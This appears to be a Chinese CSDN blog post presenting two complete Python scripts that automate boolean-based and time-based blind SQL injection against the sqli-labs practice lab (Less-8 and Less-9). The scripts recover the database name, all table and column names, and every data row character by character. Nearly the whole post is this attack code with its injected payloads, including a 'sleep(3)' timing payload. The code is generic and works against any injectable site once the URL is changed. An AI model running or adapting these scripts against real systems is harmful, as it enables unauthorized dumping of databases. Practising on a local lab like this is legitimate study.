时间盲注,boolen盲注,获取表、列、具体数据的函数

于 2025-02-18 03:04:47 发布
阅读量168 收藏
点赞数 3
文章标签: 数据库 python mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_79839801/article/details/145695369
版权

boolen盲注

import requests
 
def boolean_based_injection(url, payload_template):
    """
    布尔盲注的核心函数,通过二分法逐字符推断数据。
    """
    result = ''
    for i in range(1, 50):  # 假设目标字段长度不超过50
        low, high = 32, 128  # ASCII码范围
        while low < high:
            mid = (low + high) // 2
            response = requests.get(url, params={"id": payload_template.format(i=i, mid=mid)})
            if "You are in" in response.text:
                low = mid + 1
            else:
                high = mid
        if low == 32: break  # 没有有效字符时结束
        result += chr(low)
        print(f"Current result: {result}")
    return result
 
def get_database_name(url):
    """获取数据库名。"""
    return boolean_based_injection(url, "1' and ascii(substr(database(), {i}, 1)) > {mid}-- ")
 
def get_all_table_names(url, database_name):
    """获取所有表名。"""
    tables = []
    for index in range(20):  # 假设最多20个表
        table = boolean_based_injection(url, f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit {index},1), {{i}}, 1)) > {{mid}}-- ")
        if not table: break
        tables.append(table)
        print(f"Found table: {table}")
    return tables
 
def get_all_column_names(url, database_name, table_name):
    """获取指定表的所有列名。"""
    columns = []
    for index in range(20):  # 假设最多20个列
        column = boolean_based_injection(url, f"1' and ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}' limit {index},1), {{i}}, 1)) > {{mid}}-- ")
        if not column: break
        columns.append(column)
        print(f"Found column: {column}")
    return columns
 
def get_all_data(url, database_name, table_name, column_name):
    """获取指定列的所有数据。"""
    data = []
    for index in range(50):  # 假设最多50条数据
        row = boolean_based_injection(url, f"1' and ascii(substr((select {column_name} from {database_name}.{table_name} limit {index},1), {{i}}, 1)) > {{mid}}-- ")
        if not row: break
        data.append(row)
        print(f"Found data: {row}")
    return data
 
if __name__ == '__main__':
    url = 'http://127.0.0.1:81/sqli-labs-master//Less-8/index.php'  # Boolean 盲注的测试URL
 
    # 获取数据库名
    db_name = get_database_name(url)
    print(f"Database name: {db_name}")
 
    # 获取所有表名
    tables = get_all_table_names(url, db_name)
    print(f"All tables: {tables}")
 
    # 获取每个表的所有列名和数据
    for table in tables:
        print(f"\nTable: {table}")
        columns = get_all_column_names(url, db_name, table)
        print(f"Columns: {columns}")
 
        for column in columns:
            print(f"\nColumn: {column}")
            data = get_all_data(url, db_name, table, column)
            print(f"Data: {data}")

运行结果(部分):

 

时间盲注 

import time
import requests
 
 
def blind_injection(url, payload_template, max_length=20):
    """
    基于时间盲注的核心函数,通过二分法逐字符推断数据。
    :param url: 目标URL
    :param payload_template: SQL注入的payload模板
    :param max_length: 目标字段的最大长度
    :return: 推断出的字符串结果
    """
    result = ''
    for i in range(1, max_length + 1):  # 逐字符推断
        low, high = 32, 128  # ASCII码范围
        while low < high:
            mid = (low + high) // 2
            payload = payload_template.format(i=i, mid=mid)
            start_time = time.time()
            requests.get(url, params={"id": payload})
            end_time = time.time()
 
            # 根据响应时间判断字符
            if end_time - start_time >= 3:
                low = mid + 1
            else:
                high = mid
 
        if low == 32:  # 如果low为32,说明没有有效字符,结束循环
            break
 
        result += chr(low)
        print(f"Current result: {result}")
 
    return result
 
 
def get_data(url, query_template, max_items=20, max_length=20):
    """
    通用函数,用于获取数据库名、表名、列名或数据。
    :param url: 目标URL
    :param query_template: SQL查询模板
    :param max_items: 最大项数
    :param max_length: 每项的最大长度
    :return: 结果列表
    """
    results = []
    for index in range(max_items):
        payload_template = f"1' and if(ascii(substr(({query_template.format(index=index)}), {{i}}, 1)) > {{mid}}, sleep(3), 0)-- "
        result = blind_injection(url, payload_template, max_length)
 
        if not result:
            break
 
        results.append(result)
        print(f"Found item: {result}")
 
    return results
 
 
if __name__ == '__main__':
    url = 'http://127.0.0.1:81/sqli-labs-master/Less-9/index.php'  # 目标URL
 
    # 获取数据库名
    database_name = get_data(url, "select database()", max_items=1)[0]
    print(f"Database name: {database_name}")
 
    # 获取所有表名
    table_names = get_data(url,
                           "select table_name from information_schema.tables where table_schema='{}' limit {{index}},1".format(
                               database_name))
    print(f"All table names: {table_names}")
 
    # 获取每个表的所有列名
    for table_name in table_names:
        print(f"\nTable: {table_name}")
        column_names = get_data(url,
                                "select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {{index}},1".format(
                                    database_name, table_name))
        print(f"Columns: {column_names}")
 
        # 获取每个列的所有数据
        for column_name in column_names:
            print(f"\nColumn: {column_name}")
            data = get_data(url,
                            "select {} from {}.{} limit {{index}},1".format(column_name, database_name, table_name),
                            max_items=50, max_length=50)
            print(f"Data: {data}")

运行结果(部分):

 

简约海
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值